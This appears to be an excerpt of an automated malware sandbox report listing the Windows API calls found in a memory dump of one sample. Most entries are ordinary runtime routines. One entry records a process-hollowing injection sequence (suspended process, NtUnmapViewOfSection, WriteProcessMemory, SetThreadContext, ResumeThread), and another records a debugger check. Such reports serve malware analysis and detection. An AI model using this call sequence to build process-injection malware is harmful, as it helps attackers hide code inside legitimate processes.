                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AttributesFile
                                                                                • String ID:
                                                                                • API String ID: 3188754299-0
                                                                                • Opcode ID: d8e2bb168be1ce34d56c43fcdff15f594fe432db76a4767db7ebb6e6e6db7e8d
                                                                                • Instruction ID: 6f78139d78d56cb6b590453aa39651b950e7c394562f32962465d6c34afc5736
                                                                                • Opcode Fuzzy Hash: d8e2bb168be1ce34d56c43fcdff15f594fe432db76a4767db7ebb6e6e6db7e8d
                                                                                • Instruction Fuzzy Hash: 4521873170410457EB1CDB78CD8979DBA66AF82318F20872EE056AB3D6C77D99D04749
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetFileAttributesA.KERNEL32(00000000), ref: 00406DAE
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AttributesFile
                                                                                • String ID:
                                                                                • API String ID: 3188754299-0
                                                                                • Opcode ID: 27324f7180e8ee255e5da71523e07c5174b6b67859a79b923cec9c9cbaf76651
                                                                                • Instruction ID: d50abb1f075d277628de6893b0a2e4c9361616b9c01c9e00c549adf19bddb35f
                                                                                • Opcode Fuzzy Hash: 27324f7180e8ee255e5da71523e07c5174b6b67859a79b923cec9c9cbaf76651
                                                                                • Instruction Fuzzy Hash: 8D215A7170024457EB18CB7CDD8579DBA629F82314F20872EE006A73D6C73D9AD08749
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetFileAttributesA.KERNEL32(00000000), ref: 00406ECE
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AttributesFile
                                                                                • String ID:
                                                                                • API String ID: 3188754299-0
                                                                                • Opcode ID: 362c6498125f08797b862455f4cc48295dc643ffdcc837af3f732993820db717
                                                                                • Instruction ID: 289f7fc0fe7bfbb533813ef114a49cd37a6d843a5ca9177ffd568d9db58aea67
                                                                                • Opcode Fuzzy Hash: 362c6498125f08797b862455f4cc48295dc643ffdcc837af3f732993820db717
                                                                                • Instruction Fuzzy Hash: F92155716001445BEB18CB28DD887ADBA62AF82315F20872EF016EB3D6C73D99E08749
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: __wsopen_s
                                                                                • String ID:
                                                                                • API String ID: 3347428461-0
                                                                                • Opcode ID: 39e51a9ae018aa96119cc8505797bbbfd6c23de372fe853808090607bbf11af8
                                                                                • Instruction ID: 9aa6cf95474384ce9b0d7293c9fbf9f779c671a1d21ff581137edf38001456ac
                                                                                • Opcode Fuzzy Hash: 39e51a9ae018aa96119cc8505797bbbfd6c23de372fe853808090607bbf11af8
                                                                                • Instruction Fuzzy Hash: 98111571A0420AAFCB05DF58E9419DB7BF9EF48308F05446AF809AB351D630EE11CBA8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free
                                                                                • String ID:
                                                                                • API String ID: 269201875-0
                                                                                • Opcode ID: 320449895dae44280f45e36a1c53ebf6393d9d1aeb881ef4eff7373e47e76e92
                                                                                • Instruction ID: 9f84641a8e355f557e7896b4adeaf2d4c198206c9c94aa778f783292d4e880cf
                                                                                • Opcode Fuzzy Hash: 320449895dae44280f45e36a1c53ebf6393d9d1aeb881ef4eff7373e47e76e92
                                                                                • Instruction Fuzzy Hash: 5C018872C14508EEDF01AFA59C027DE7FF4AF44364F10416BE814E21D1E6348A80CB85
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free
                                                                                • String ID:
                                                                                • API String ID: 269201875-0
                                                                                • Opcode ID: f0494b7c96f61bce48558fe6fa7ea348df39f2d3ae51a74188536c639171ff39
                                                                                • Instruction ID: 1dc86aa3e5ced6e6019f35d723f8b03e8969c843b7649f5991262bb12d54d837
                                                                                • Opcode Fuzzy Hash: f0494b7c96f61bce48558fe6fa7ea348df39f2d3ae51a74188536c639171ff39
                                                                                • Instruction Fuzzy Hash: 1D017C72D00129AFCF01AFA9DC029EE7FF5BF08310F14416AF914E2192E6358A61DB84
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • RtlAllocateHeap.NTDLL(00000000,00412EFB,?,?,00413B2E,?,?,?,?,?,00412DCB,00412EFB,?,?,?,?), ref: 00419D4C
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocateHeap
                                                                                • String ID:
                                                                                • API String ID: 1279760036-0
                                                                                • Opcode ID: c50bfd75e690cc3565ee69bcd598425367f7b7c87482b5d811cd0e7b290e3381
                                                                                • Instruction ID: e82d7a924258f4014c7f9805f205df5ab038d64f08f3a022c1942b3ffcdc7e8d
                                                                                • Opcode Fuzzy Hash: c50bfd75e690cc3565ee69bcd598425367f7b7c87482b5d811cd0e7b290e3381
                                                                                • Instruction Fuzzy Hash: 9EE0E5311002615AF731276AAC16BDB77689F017A0F410127ED1496690CF18CCC182EE
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • CreateFileW.KERNEL32(00000000,00000000,?,00420ED0,?,?,00000000,?,00420ED0,00000000,0000000C), ref: 00420AFD
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateFile
                                                                                • String ID:
                                                                                • API String ID: 823142352-0
                                                                                • Opcode ID: 9a6ad2ea90029b4c2e15957a97bae2e606db04cb1e580b5057d6e7233006ae40
                                                                                • Instruction ID: df6ee74224201c279f888e790554f52de9bf06fc31efb5333251f0d5694bd2f3
                                                                                • Opcode Fuzzy Hash: 9a6ad2ea90029b4c2e15957a97bae2e606db04cb1e580b5057d6e7233006ae40
                                                                                • Instruction Fuzzy Hash: F1D06C3210010DBFDF128F84DD06EDA3FAAFB48754F014110BE1856020C732E832EB94
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Sleep
                                                                                • String ID:
                                                                                • API String ID: 3472027048-0
                                                                                • Opcode ID: aaf232366fb94f604feeaa9ec1af2e8c726d3f61ffbe15cd595fa9554d978415
                                                                                • Instruction ID: d63085822b572d9c4808d455b94cc7ab1b21f6ff2bfad748f91368678f74763d
                                                                                • Opcode Fuzzy Hash: aaf232366fb94f604feeaa9ec1af2e8c726d3f61ffbe15cd595fa9554d978415
                                                                                • Instruction Fuzzy Hash: E3E0D832B6001823441432BE1E1B8AE79058699724F8403AFFD146B3C3FDCA196143DF
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Sleep
                                                                                • String ID:
                                                                                • API String ID: 3472027048-0
                                                                                • Opcode ID: 4da8834e69f3bb509059b9d5debb7bdd98a6cf23a647b1472579b711b603cb3c
                                                                                • Instruction ID: 67f3a53b58ae4672857f76a35c837d9aa195a60236746adfc71dfd272b3108a3
                                                                                • Opcode Fuzzy Hash: 4da8834e69f3bb509059b9d5debb7bdd98a6cf23a647b1472579b711b603cb3c
                                                                                • Instruction Fuzzy Hash: 0FE0DF22B0012833440132BB2E1755E791649EA764B9802AEE9253B3C7FDC9296202DF
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Sleep
                                                                                • String ID:
                                                                                • API String ID: 3472027048-0
                                                                                • Opcode ID: 02fb79eb8d78126249686e8a13bdbc7e03d7a137c383fef068ab499a6f9bc4af
                                                                                • Instruction ID: 3088f4c5383378a78d3067ff3d90fb76fea575e1404fbd4841692f20d8828fbb
                                                                                • Opcode Fuzzy Hash: 02fb79eb8d78126249686e8a13bdbc7e03d7a137c383fef068ab499a6f9bc4af
                                                                                • Instruction Fuzzy Hash: 95E0DF22B0052823440132BE0E1756E791649EB764BA507AEE9153B3C7FED9296202DF
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Sleep
                                                                                • String ID:
                                                                                • API String ID: 3472027048-0
                                                                                • Opcode ID: 96e0f5eb0d2bf54495afc101f66f805ee5e47a00619bcf218a2e43eae606c85d
                                                                                • Instruction ID: 96c900ffb1ff59443f85d08dbb8b643960cb3f290a4d12e33a3e118b64c1dff3
                                                                                • Opcode Fuzzy Hash: 96e0f5eb0d2bf54495afc101f66f805ee5e47a00619bcf218a2e43eae606c85d
                                                                                • Instruction Fuzzy Hash: 16E0D821B40128234401327A1E1755E791549AA764B9402AEF9553B3C7FDC9196202DF
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,00000000,00000000), ref: 0040318C
                                                                                • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,?,00000000,00000000), ref: 004031E5
                                                                                • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004,?,00000000,00000000), ref: 004031FE
                                                                                • GetThreadContext.KERNEL32(?,00000000,?,00000000,00000000), ref: 00403213
                                                                                • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,00000000,00000000), ref: 00403236
                                                                                • GetModuleHandleA.KERNEL32(ntdll.dll,NtUnmapViewOfSection,?,00000000,00000000), ref: 0040324E
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00403255
                                                                                • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,00000000,00000000), ref: 00403274
                                                                                • WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000,?,00000000,00000000), ref: 0040328F
                                                                                • WriteProcessMemory.KERNEL32(?,?,?,?,00000000,?,?,00000000,?,00000000,00000000), ref: 004032CC
                                                                                • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,?,00000000,?,00000000,00000000), ref: 004032FC
                                                                                • SetThreadContext.KERNEL32(?,00000000,?,?,00000000,?,00000000,00000000), ref: 00403312
                                                                                • ResumeThread.KERNEL32(?,?,?,00000000,?,00000000,00000000), ref: 0040331B
                                                                                • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,?,00000000,00000000), ref: 00403329
                                                                                • VirtualFree.KERNEL32(?,00000000,00008000,?,00000000,00000000), ref: 00403340
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Process$MemoryVirtual$ThreadWrite$AllocContextFreeModule$AddressCreateFileHandleNameProcReadResume
                                                                                • String ID: NtUnmapViewOfSection$ntdll.dll
                                                                                • API String ID: 4033543172-1050664331
                                                                                • Opcode ID: 72a89dbbd744e7cb8fcd80e021ea31b4752818fdbca5ddff54c25610d5fa83f2
                                                                                • Instruction ID: 3ffd02da402aa7f4463b4f59e999fc4fb9920325e96c044051a93c4d0759f666
                                                                                • Opcode Fuzzy Hash: 72a89dbbd744e7cb8fcd80e021ea31b4752818fdbca5ddff54c25610d5fa83f2
                                                                                • Instruction Fuzzy Hash: FE517D71A40305BBDB218F94DC85FEABB78FF08705F504065FA14EA2D0D7B4A955CB98
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00412EFB), ref: 00417DEE
                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00412EFB), ref: 00417DF8
                                                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00412EFB), ref: 00417E05
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                • String ID:
                                                                                • API String ID: 3906539128-0
                                                                                • Opcode ID: 7bb259621451575564cc74585fdf1fd9faebc5539d4cdaaece710669a9e8dcba
                                                                                • Instruction ID: 8ad6b199a4053eccb8d84ef27c27c26dfd057c929d936eac1fcf199e67928cb7
                                                                                • Opcode Fuzzy Hash: 7bb259621451575564cc74585fdf1fd9faebc5539d4cdaaece710669a9e8dcba
                                                                                • Instruction Fuzzy Hash: 0B31B3B59013189BCB21DF69D8897DDBBB8BF08310F5041EAE41CA6250EB749FC58F48
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32(?,?,004153F0,004053F0,00000000,?,004053F0,?,0041BF8C), ref: 00415413
                                                                                • TerminateProcess.KERNEL32(00000000,?,004153F0,004053F0,00000000,?,004053F0,?,0041BF8C), ref: 0041541A
                                                                                • ExitProcess.KERNEL32 ref: 0041542C
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Process$CurrentExitTerminate
                                                                                • String ID:
                                                                                • API String ID: 1703294689-0
                                                                                • Opcode ID: 474f2a571a10c6b5d588eb5a9c8dd6d434d2b884cef2c402f38dbe37c319379d
                                                                                • Instruction ID: d2fc69c6b63f07366f982219d88191eb639811dfa6c355660c8db48cc4563389
                                                                                • Opcode Fuzzy Hash: 474f2a571a10c6b5d588eb5a9c8dd6d434d2b884cef2c402f38dbe37c319379d
                                                                                • Instruction Fuzzy Hash: EFE0BF31100558EBCB216B55ED5DADA3B69EB84386B844425F50986231CB39DDD2DA88
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00413469
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FeaturePresentProcessor
                                                                                • String ID:
                                                                                • API String ID: 2325560087-0
                                                                                • Opcode ID: b3876dc35d0dec0636d8222ba7b8c691e8f0be0c1f56d4eb916fada070419bb0
                                                                                • Instruction ID: 473c36c59a99c4c54e878396bb3ac2ca046b9f43a5d1d73b1e588037c34bbea7
                                                                                • Opcode Fuzzy Hash: b3876dc35d0dec0636d8222ba7b8c691e8f0be0c1f56d4eb916fada070419bb0
                                                                                • Instruction Fuzzy Hash: 6D515DB1A016059FDB28CF59D9816AEBBF1FB88315F24842AD505EB350D379DA80CB58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 02aa87b735a0239f5bc11e9f455b4d6cc536ac29f9a9e46b1f7f442210fd5752
                                                                                • Instruction ID: e58f6b1100cdf6cda000f78aa6645623883c0ac0ed8034f6ac1cf53a7d431274
                                                                                • Opcode Fuzzy Hash: 02aa87b735a0239f5bc11e9f455b4d6cc536ac29f9a9e46b1f7f442210fd5752
                                                                                • Instruction Fuzzy Hash: 8F41C6B580421CAEDB24DF7ACC89AEABBB9EF45304F1402DEE81DD3201D6359E848F54
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 22c8ee549e0e701cc67c10f8b31497336b99bd38d043062465dd4583a8c5f113
                                                                                • Instruction ID: 759b557f5919ee7ffbaced31b2f99112918cefaab1d352476621969a8bbbd54c
                                                                                • Opcode Fuzzy Hash: 22c8ee549e0e701cc67c10f8b31497336b99bd38d043062465dd4583a8c5f113
                                                                                • Instruction Fuzzy Hash: 00E08C72926268FBCB14DB89C90898AF3ECEB48B04B15459BF505D3200C274DE80C7D4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • ___free_lconv_mon.LIBCMT ref: 0041FD9F
                                                                                  • Part of subcall function 0041F938: _free.LIBCMT ref: 0041F955
                                                                                  • Part of subcall function 0041F938: _free.LIBCMT ref: 0041F967
                                                                                  • Part of subcall function 0041F938: _free.LIBCMT ref: 0041F979
                                                                                  • Part of subcall function 0041F938: _free.LIBCMT ref: 0041F98B
                                                                                  • Part of subcall function 0041F938: _free.LIBCMT ref: 0041F99D
                                                                                  • Part of subcall function 0041F938: _free.LIBCMT ref: 0041F9AF
                                                                                  • Part of subcall function 0041F938: _free.LIBCMT ref: 0041F9C1
                                                                                  • Part of subcall function 0041F938: _free.LIBCMT ref: 0041F9D3
                                                                                  • Part of subcall function 0041F938: _free.LIBCMT ref: 0041F9E5
                                                                                  • Part of subcall function 0041F938: _free.LIBCMT ref: 0041F9F7
                                                                                  • Part of subcall function 0041F938: _free.LIBCMT ref: 0041FA09
                                                                                  • Part of subcall function 0041F938: _free.LIBCMT ref: 0041FA1B
                                                                                  • Part of subcall function 0041F938: _free.LIBCMT ref: 0041FA2D
                                                                                • _free.LIBCMT ref: 0041FD94
                                                                                  • Part of subcall function 00419831: HeapFree.KERNEL32(00000000,00000000,?,0041FAC9,?,00000000,?,?,?,0041FAF0,?,00000007,?,?,0041FEF2,?), ref: 00419847
                                                                                  • Part of subcall function 00419831: GetLastError.KERNEL32(?,?,0041FAC9,?,00000000,?,?,?,0041FAF0,?,00000007,?,?,0041FEF2,?,?), ref: 00419859
                                                                                • _free.LIBCMT ref: 0041FDB6
                                                                                • _free.LIBCMT ref: 0041FDCB
                                                                                • _free.LIBCMT ref: 0041FDD6
                                                                                • _free.LIBCMT ref: 0041FDF8
                                                                                • _free.LIBCMT ref: 0041FE0B
                                                                                • _free.LIBCMT ref: 0041FE19
                                                                                • _free.LIBCMT ref: 0041FE24
                                                                                • _free.LIBCMT ref: 0041FE5C
                                                                                • _free.LIBCMT ref: 0041FE63
                                                                                • _free.LIBCMT ref: 0041FE80
                                                                                • _free.LIBCMT ref: 0041FE98
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                • String ID: pHC
                                                                                • API String ID: 161543041-2093311077
                                                                                • Opcode ID: eb67e74285b0b5bc0feccf2213fce49585234ec33f1775e8558bc069fd7523e8
                                                                                • Instruction ID: 4a9129aae736ae88eacdb551291de9e3695affe57c782cfc860587fe6fd01682
                                                                                • Opcode Fuzzy Hash: eb67e74285b0b5bc0feccf2213fce49585234ec33f1775e8558bc069fd7523e8
                                                                                • Instruction Fuzzy Hash: B3314A716007049BEB21AA7AE945BDB73E8BF01714F10543BE459D62A2DB38EDC6CB18
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID: 0-3907804496
                                                                                • Opcode ID: e712be87937d2255297886a4463a4d35215c84bd15c7b543791e2da1d6b4ca20
                                                                                • Instruction ID: 0b94103b8dc601ec7b0e7d22b72ef5801b8f68df710c3e41ba3dfc15adef6844
                                                                                • Opcode Fuzzy Hash: e712be87937d2255297886a4463a4d35215c84bd15c7b543791e2da1d6b4ca20
                                                                                • Instruction Fuzzy Hash: 5EC1D0B0E04645ABCF11DF99D880BEE7BB1BF49304F14416AE505AB392C7789D82CB6D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • _free.LIBCMT ref: 0041A020
                                                                                  • Part of subcall function 00419831: HeapFree.KERNEL32(00000000,00000000,?,0041FAC9,?,00000000,?,?,?,0041FAF0,?,00000007,?,?,0041FEF2,?), ref: 00419847
                                                                                  • Part of subcall function 00419831: GetLastError.KERNEL32(?,?,0041FAC9,?,00000000,?,?,?,0041FAF0,?,00000007,?,?,0041FEF2,?,?), ref: 00419859
                                                                                • _free.LIBCMT ref: 0041A02C
                                                                                • _free.LIBCMT ref: 0041A037
                                                                                • _free.LIBCMT ref: 0041A042
                                                                                • _free.LIBCMT ref: 0041A04D
                                                                                • _free.LIBCMT ref: 0041A058
                                                                                • _free.LIBCMT ref: 0041A063
                                                                                • _free.LIBCMT ref: 0041A06E
                                                                                • _free.LIBCMT ref: 0041A079
                                                                                • _free.LIBCMT ref: 0041A087
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                • String ID:
                                                                                • API String ID: 776569668-0
                                                                                • Opcode ID: f51e08cf45efe2f1290865fdcf44f134f2fc23412f79976fde5c04ec2e51d42a
                                                                                • Instruction ID: 789f807970beedde86f42124912c247cb3622bcb1a662f41c579803275495e94
                                                                                • Opcode Fuzzy Hash: f51e08cf45efe2f1290865fdcf44f134f2fc23412f79976fde5c04ec2e51d42a
                                                                                • Instruction Fuzzy Hash: A421B776910108AFCB01EFA5C991DDE7BB8FF08744F4051AAF9159B121DB35EB85CB84
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • _ValidateLocalCookies.LIBCMT ref: 00413CA7
                                                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 00413CAF
                                                                                • _ValidateLocalCookies.LIBCMT ref: 00413D38
                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 00413D63
                                                                                • _ValidateLocalCookies.LIBCMT ref: 00413DB8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                • String ID: csm$csm$k8A
                                                                                • API String ID: 1170836740-2549497851
                                                                                • Opcode ID: 20f692a8463f5ea56aba7d714a54a4906b361c5d6f055e40f54bf5ba7ff5e9be
                                                                                • Instruction ID: 4bdc104e93520a6c8af43ba2a565407c55df42a25823de545f8eab99a3cdc4b2
                                                                                • Opcode Fuzzy Hash: 20f692a8463f5ea56aba7d714a54a4906b361c5d6f055e40f54bf5ba7ff5e9be
                                                                                • Instruction Fuzzy Hash: 6751B034A00304DFCF14DF69D844ADEBBB1AF44716F14809AE8155B392C739EE86CB99
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free$___from_strstr_to_strchr
                                                                                • String ID:
                                                                                • API String ID: 3409252457-0
                                                                                • Opcode ID: e2623dc87834c1fff3dfe5bdacbf93d4b37835c931e4fba3fdf79d6dcaf3362d
                                                                                • Instruction ID: 93c6e48ddd13b2e5095a2414999f5a3477f305bbf095d1791bf51076da58aa5d
                                                                                • Opcode Fuzzy Hash: e2623dc87834c1fff3dfe5bdacbf93d4b37835c931e4fba3fdf79d6dcaf3362d
                                                                                • Instruction Fuzzy Hash: EC51D6B1904205AFDB20AF65D841AEEB7A4BF01314F54417FED209B281DB3D89CBCA5D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_400000_0XzeMRyE1e.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: api-ms-$ext-ms-
                                                                                • API String ID: 0-537541572
                                                                                • Opcode ID: 9df3d8af041b0fb0acc834ca29a1e5c71ca3f6008ef4501e141ea45a13f3b2e7
                                                                                • Instruction ID: ec0bc9ec60f00b922b8a815a17a921a967879e401feb257c4b0c37be3eaed7fd
